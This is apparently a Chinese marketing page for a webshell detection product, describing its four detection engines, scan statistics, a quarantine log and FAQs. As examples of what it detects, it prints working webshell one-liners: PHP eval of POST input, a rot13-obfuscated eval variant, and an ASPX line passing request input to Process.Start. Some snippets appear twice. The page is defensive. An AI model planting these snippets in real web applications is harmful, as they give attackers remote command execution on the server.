🦠 WEBSHELL DETECTION
Webshell 查杀系统
四引擎智能查杀——静态特征+动态行为+AI语义+YARA规则,
精准识别各种一句话、大马、变种Webshell,误报率 < 0.1%
1.2M
已扫描文件
284
查杀Webshell
<0.1%
误报率
42秒
全量扫描耗时
🔍 典型Webshell 代码特征
常见的Webshell变种及检测引擎的识别方式
// 一句话木马 (PHP) — 静态特征+AI检测
<?php
@eval($_POST['cmd']);
?>
// 混淆变种 (PHP)
<?php
$x=str_rot13('riny');
$x($_REQUEST['a']);
?>
<?php
@eval($_POST['cmd']);
?>
// 混淆变种 (PHP)
<?php
$x=str_rot13('riny');
$x($_REQUEST['a']);
?>
// JSP Webshell (冰蝎/哥斯拉)
<%@page import="javax.crypto.*"%>
<%
ClassLoader loader = Thread.currentThread().getContextClassLoader();
Method defineClass = ... // 反射加载
AES解密 + ClassLoader加载 → 混淆执行
%>
// ASPX Webshell
<%@ Page Language="C#"%>
<% System.Diagnostics.Process.Start( Request["cmd"] ); %>
<%@page import="javax.crypto.*"%>
<%
ClassLoader loader = Thread.currentThread().getContextClassLoader();
Method defineClass = ... // 反射加载
AES解密 + ClassLoader加载 → 混淆执行
%>
// ASPX Webshell
<%@ Page Language="C#"%>
<% System.Diagnostics.Process.Start( Request["cmd"] ); %>
🧬 四引擎 查杀矩阵
多维度交叉检测,让Webshell无处可逃
📝
静态特征引擎
20万+特征签名库,覆盖已知Webshell的代码特征、文件哈希、函数调用链
⚙️
动态沙箱引擎
在隔离沙箱中模拟执行可疑脚本,监控其行为(网络连接、文件操作、命令执行)
🧠
AI语义引擎
基于CodeBERT的代码语义分析,识别混淆和变种后的恶意代码意图
🎯
YARA规则引擎
8,000+ YARA规则,可由安全团队自定义添加专项检测规则
📋 查杀记录
Webshell查杀历史
| 文件路径 | Webshell类型 | 检测引擎 | 置信度 | 发现时间 | 处置 |
|---|---|---|---|---|---|
| /var/www/html/images/avatar.php | PHP一句话 | 静态+AI | 99.8% | 14:32 | 已隔离 |
| /var/www/html/inc/class.log.php | 冰蝎JSP | 沙箱+YARA | 97.2% | 12:15 | 已隔离 |
| /var/www/html/tmp/cache.asp | ASPX大马 | 静态+沙箱 | 95.5% | 09:40 | 已隔离 |
| /var/www/html/upload/2024/test.gif | 图片马 | AI语义 | 88.3% | 08:22 | 待确认 |
🛡️ 核心能力
🔄
深度解混淆
自动逆向常见的PHP/Python/JSP混淆技术——字符串拼接、Base64+压缩、加密eval、反射调用等
🖼️
图片马检测
检测隐藏在图片EXIF、尾部数据中的恶意代码,识别以.jpg/.gif/.png上传的图片马
📦
压缩包内检测
支持对.zip/.tar.gz/.war等压缩包内的文件递归扫描,发现隐藏在压缩包中的Webshell
🗑️
安全隔离
检测到的Webshell自动移至隔离区(修改权限为000),保留原始文件用于取证分析
⏰
定时扫描
支持每日低峰期(如凌晨2点)自动全量扫描,新文件实时监控,写入即扫描
🔗
关联溯源
发现Webshell后自动关联分析——上传时间、上传IP、关联的攻击链、横向移动行为
💡 常见问题
Q: 会对正常PHP文件误报吗?
四引擎交叉验证大幅降低误报。白名单机制支持添加可信目录和可信文件签名(如WordPress核心文件),确保不会误删正常系统文件。
Q: 支持哪些编程语言的Webshell检测?
全面支持 PHP / JSP / ASP / ASPX / Python / Perl / Ruby / Node.js —— 覆盖所有常见Web后端语言。
Q: 内存Webshell能检测吗?
支持。对于Java Filter型内存马、PHP无文件Webshell,可通过进程内存扫描和JVM类加载监控进行检测。